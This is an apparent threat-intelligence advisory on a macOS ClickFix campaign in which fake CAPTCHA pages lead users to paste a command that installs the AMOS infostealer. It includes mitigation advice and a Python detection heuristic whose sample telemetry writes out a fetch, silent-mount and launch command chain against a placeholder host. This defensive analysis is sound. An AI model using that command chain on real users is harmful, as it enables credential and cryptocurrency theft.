
New macOS ClickFix attack silently mounts DMGs to push infostealer

Medium
Malware, macOS
Published: 06/23/2026 (06/23/2026, 18:30:16 UTC)
Source: Bleeping Computer

Description

A new macOS malware campaign called ClickFix uses social engineering to trick users into running a malicious Terminal command that silently downloads, mounts, and executes a disk image (DMG) containing the Atomic macOS Stealer (AMOS) infostealer. This malware steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents. The attack begins with a fake CAPTCHA page instructing users to paste a Terminal command, which downloads and mounts the malicious DMG without user visibility. The stealer targets multiple Chromium- and Firefox-based browsers, various cryptocurrency wallets, Telegram Desktop, Discord, Apple Notes, Safari cookies, and Apple Keychain. It also replaces legitimate Ledger Live and Trezor Suite installations with malicious versions to facilitate crypto theft. The stolen data is archived and uploaded to attacker-controlled servers. Users are advised to be cautious about executing Terminal commands from untrusted sources.

AI-Powered Analysis

Machine-generated threat intelligence

Last updated: 06/23/2026, 18:40:38 UTC

Technical Analysis

The ClickFix macOS campaign employs social engineering by presenting fake CAPTCHA pages that instruct victims to execute a Terminal command. This command silently downloads a malicious DMG file from attacker-controlled servers, mounts it with macOS's native hdiutil utility using the -nobrowse flag (which keeps the mounted volume out of Finder, so the user sees no new disk), and automatically launches the application contained in the image. The payload is the Atomic macOS Stealer (AMOS), which harvests sensitive data including credentials from eight Chromium-based browsers and multiple Firefox derivatives, cryptocurrency wallet data from numerous wallet applications, messaging app data (Telegram Desktop and Discord), Apple Notes, Safari cookies, Apple Keychain, and user documents with PDF, TXT, or RTF extensions. The malware also replaces legitimate cryptocurrency management software (Ledger Live and Trezor Suite) with malicious versions to facilitate theft. All collected data is compressed and exfiltrated to attacker servers. The campaign was discovered by Palo Alto Networks Unit 42 and uses command-and-control domains such as svs-verificationdate[.]beer. The attack combines social engineering with native macOS utilities, so no exploit is needed and the execution chain looks like ordinary user activity to tools that only watch for exploits or unsigned binaries.

Potential Impact

The campaign results in the compromise of sensitive user data including browser credentials, stored payment cards, authentication tokens, cryptocurrency wallets, messaging app data, Apple Keychain passwords, and user documents. The replacement of legitimate Ledger Live and Trezor Suite applications with malicious versions poses a direct risk of cryptocurrency theft. The silent mounting and execution of malware without user awareness increases the likelihood of successful infection. This can lead to significant privacy breaches, financial loss, and unauthorized access to personal and corporate accounts.

Mitigation Recommendations

No official patch or fix is available as this is a social engineering attack leveraging native macOS utilities. Users should be educated to never execute Terminal commands from untrusted or suspicious sources, especially those presented as CAPTCHA verifications or system fixes. Security teams should raise awareness about the ClickFix technique and monitor for suspicious use of hdiutil and unexpected DMG mounts. Since the attack relies on user interaction, user training and caution are the primary mitigations. There is no indication that vendor patches or updates can prevent this attack directly.
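As an added illustration of the "monitor for suspicious use of hdiutil and unexpected DMG mounts" advice (example code written for this page, not from the article or Unit 42): a Python heuristic that scores process telemetry for the chain described above, a download, then `hdiutil attach -nobrowse` on an image in a temp path, then a launch from /Volumes, all as children of one shell. The event layout, the use of pid order as a time proxy, and the sample events are assumptions; real input would come from an EDR or the unified log.

```python
import re
import shlex
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int       # assumption: pid order is a usable time proxy within one shell session
    ppid: int
    name: str
    cmdline: str

# Constructed sample telemetry; domain and paths are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    ProcEvent(200, 100, "zsh", "/bin/zsh -l"),
    ProcEvent(201, 200, "curl", "curl -fsSL https://verify.example.invalid/v.dmg -o /tmp/.v.dmg"),
    ProcEvent(202, 200, "hdiutil", "hdiutil attach -nobrowse -quiet /tmp/.v.dmg"),
    ProcEvent(203, 200, "open", "open /Volumes/Verify/Verify.app"),
    # Benign: a user mounts a downloaded installer by hand (no -nobrowse, no fetch in that shell).
    ProcEvent(300, 100, "zsh", "/bin/zsh -l"),
    ProcEvent(301, 300, "hdiutil", "hdiutil attach /Users/dev/Downloads/Docker.dmg"),
]

DOWNLOADERS = {"curl", "wget"}
TEMP_PATH = re.compile(r"^(/private)?/tmp/|^/var/folders/|^/Users/[^/]+/Library/Caches/")

def is_silent_mount(ev: ProcEvent) -> bool:
    # `hdiutil attach -nobrowse` keeps the mounted volume out of Finder, as the campaign does.
    if ev.name != "hdiutil":
        return False
    argv = shlex.split(ev.cmdline)
    return "attach" in argv and "-nobrowse" in argv

def detect_clickfix_chain(events):
    """One finding per silent mount that is corroborated by at least two other chain signals."""
    findings = []
    for ev in events:
        if not is_silent_mount(ev):
            continue
        siblings = [s for s in events if s.ppid == ev.ppid]   # other children of the same shell
        dmg = next((a for a in shlex.split(ev.cmdline) if a.lower().endswith(".dmg")), "")
        reasons = ["hdiutil attach with -nobrowse"]
        if TEMP_PATH.match(dmg):
            reasons.append("image mounted from temp/cache path: " + dmg)
        if any(s.name in DOWNLOADERS and s.pid < ev.pid for s in siblings):
            reasons.append("downloader ran earlier in the same shell")
        if any(s.name == "open" and "/Volumes/" in s.cmdline and s.pid > ev.pid for s in siblings):
            reasons.append("app launched from /Volumes after the mount")
        if len(reasons) >= 3:
            findings.append({"shell_pid": ev.ppid, "hdiutil_pid": ev.pid, "reasons": reasons})
    return findings
```

The benign manual mount in the sample is not flagged because it lacks -nobrowse, the temp path, and a sibling download; the threshold of three signals is a tunable starting point, not a tested production rule.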


Technical Details

Article Source
https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/ (fetched 2026-06-23T18:40:27Z, 958 words)

Threat ID: 6a3ad31beed863c81e7555c0

Added to database: 06/23/2026, 18:40:27 UTC

Last enriched: 06/23/2026, 18:40:38 UTC

Last updated: 06/23/2026, 20:52:09 UTC

